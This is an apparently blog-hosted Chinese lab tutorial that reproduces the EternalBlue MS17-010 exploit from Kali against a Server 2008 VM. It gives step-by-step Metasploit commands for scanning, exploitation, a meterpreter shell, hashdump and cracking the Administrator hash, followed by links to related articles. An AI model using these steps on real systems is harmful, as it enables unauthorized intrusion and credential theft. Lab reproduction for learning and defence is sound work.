kali (永恒之蓝MS17_010)漏洞复现

简介: kali (永恒之蓝MS17_010)漏洞复现

需要的机子:

渗透机(Linux(kali)一台),靶机(server 2008一台)

需要的环境:

kali,安装msf框架 server 2008,开启445端口

kali安装msf:

apt-get update #安装更新

apt-get install metasploit-framework #安装msf框架

server的配置简单,控制面板 开启445端口

开始复现:

先确认IP是否能ping通

靶机IP:

渗透机ip:

1.渗透机检测一下是否能ping通 :

也是能ping通,那就正式开始了

2.使用nmap指定445端口扫描,查看是否开启

nmap -p 445 192.168.0.116

开启了那就下一步

3.启动msf console界面:

4.search ms17-010   #查看ms17-010可使用的模块

(模块介绍:MS17-010 漏洞利用总结 (leanote.com))

5.使用辅助模块3(探测目标机器是否有永恒之蓝漏洞)

use 3    #进入模块3,使用模块

set RHOSTS 192.168.0.116     #设置靶机ip为192.168.0.116

run   #开始运行

检查出来server2008可能存在ms17-010漏洞,那就开始攻击

6.使用攻击模块0,进行攻击(使用永恒之蓝攻击模块)

use 0   #使用0模块

set RHOSOT 192.168.0.116    #设置攻击ip

run    #开始运行

有WIN字眼时,出现meterpreter,也就是攻击成功了,成功get shell

7.在meterpreter也可以使用很多命令

meterpreter常用命令大全_凉水沏茶的博客-CSDN博客_meterpreter命令

(1)攻击成功重要的就是抓哈希了   hashdump  #抓哈希密码

复制冒号后面的哈希密码,去cmd5解密

得到Administrator密码123123

8.在meterpreter进入靶机管理员DOS界面

拿到管理员权限首先要更改编码格式,不然会乱码

chcp 65001  #更改编码格式

DOS的命令在这里都可以使用

Dos命令大全完整版_Juniversey的博客-CSDN博客_dos命令大全

目录
相关文章
|
2月前
|
安全 程序员 网络安全
Kali渗透测试:对软件的溢出漏洞进行测试
Kali渗透测试:对软件的溢出漏洞进行测试
42 1
|
7月前
|
SQL 安全 测试技术
渗透测试基础之永恒之蓝漏洞复现
对于当下来说我们使用的电脑大多是win11或是win10,还是有很多政府和公司,或是学校中使用的系统还停留在win7系统.今天是我进行渗透测试的第一次实战,通过永恒之蓝漏洞利用对win7系统进行渗透,当然也会对渗透测试的流程进行一个详细的介绍.,渗透测试的流程信息较为详细,内容较多,如果想看实战流程,直接通过通过这次的渗透测试,虽然不是对web间进行渗透测试,但是通过实战能够使我能够熟悉渗透测试的流程,当然在实践过程中也出现了很多问题,例如从kali上传文件到win主机路径出现问题,配置攻击模块时将ip地址设置错误,但在我不断的思考和尝试下,最终解决了问题,对于我的解决问题的能力也是一种提升.
371 3
|
7月前
|
安全 网络安全 Windows
永恒之蓝(ms17_010)漏洞攻击原理与防护加固
通过nmap检测到目标服务器开放445端口,疑似存在MS17_010(永恒之蓝)漏洞。利用MSF的eternalblue模块成功入侵,获得system权限,证实漏洞存在。随后,通过禁用并停止Server服务进行加固。再次尝试攻击,显示加固有效,攻击失败。
821 0
|
7月前
|
安全 网络协议 Shell
永恒之蓝(MS17-010)漏洞利用
永恒之蓝(MS17-010)漏洞利用
443 1
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
1149 5
ms17-010(永恒之蓝)漏洞复现
|
安全 Linux 网络安全
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位(一)
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位(一)
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
144 0
|
安全 开发工具 git
win10永恒之黑漏洞复现
win10永恒之黑漏洞复现
133 0
|
安全 网络安全 API
MS17-010永恒之蓝漏洞的浅谈与利用
MS17-010永恒之蓝漏洞的浅谈与利用
468 0
|
安全 网络安全 虚拟化
windows10永恒之黑漏洞复现
windows10永恒之黑漏洞复现
2247 0